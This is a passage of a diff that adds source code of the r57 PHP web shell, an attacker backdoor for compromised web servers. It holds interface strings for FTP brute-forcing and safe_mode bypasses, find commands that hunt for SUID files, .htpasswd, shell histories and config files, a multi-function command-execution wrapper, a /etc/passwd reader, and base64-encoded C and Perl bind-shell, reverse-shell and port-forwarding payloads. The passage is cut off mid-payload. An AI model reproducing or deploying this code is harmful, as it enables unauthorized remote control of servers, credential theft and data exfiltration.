+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'Download files from server',
+'eng_butt14'=>'Download',
+'eng_text87'=>'Download files from remote ftp-server',
+'eng_text88'=>'FTP-server:port',
+'eng_text89'=>'File on ftp',
+'eng_text90'=>'Transfer mode',
+'eng_text91'=>'Archivation',
+'eng_text92'=>'without archivation',
+'eng_text93'=>'FTP',
+'eng_text94'=>'FTP-bruteforce',
+'eng_text95'=>'Users list',
+'eng_text96'=>'Can\'t get users list',
+'eng_text97'=>'checked: ',
+'eng_text98'=>'success: ',
+'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
+'eng_text100'=>'Send file to remote ftp server',
+'eng_text101'=>'Use reverse (user -> resu) login for password',
+'eng_text102'=>'Mail',
+'eng_text103'=>'Send email',
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_butt15'=>'Send',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+'eng_text111'=>'SQL-Server : Port',
+'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
+'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
+'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
+'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
+'eng_text116'=>'Copy from',
+'eng_text117'=>'to',
+'eng_text118'=>'File copied',
+'eng_text119'=>'Cant copy file',
+'eng_err0'=>'Error! Can\'t write in file ',
+'eng_err1'=>'Error! Can\'t read file ',
+'eng_err2'=>'Error! Can\'t create ',
+'eng_err3'=>'Error! Can\'t connect to ftp',
+'eng_err4'=>'Error! Can\'t login on ftp server',
+'eng_err5'=>'Error! Can\'t change dir on ftp',
+'eng_err6'=>'Error! Can\'t sent mail',
+'eng_err7'=>'Mail send',
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Webdings color=gray>4</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users'])) 
+ { 
+ if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else 
+  { 
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); 
+ }
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
+if(empty($dir))
+ { 
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); } 
+ if(empty($os)){ $os ="-"; $unix=1; } 
+ else
+    {
+    if(@eregi("^win",$os)) { $unix = 0; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die(); 
+  }                                                          
+if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function get_users()
+{
+  $users = array();
+  $rows=file('/etc/passwd');
+  if(!$rows) return 0;	
+  foreach ($rows as $string)
+   {
+   	$user = @explode(":",$string);
+   	if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users; 	
+}
+function err($n,$txt='')
+{
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';	
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
+if(!empty($txt)) { echo " $txt"; }
+echo '</b></div></font></td></tr></table>';
+return null;
+}
+function perms($mode)
+{
+if (!$GLOBALS['unix']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value,$checked=0)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\"";
+ if($checked) $ret .= " checked";
+ return $ret.">";
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err(0);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }	
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
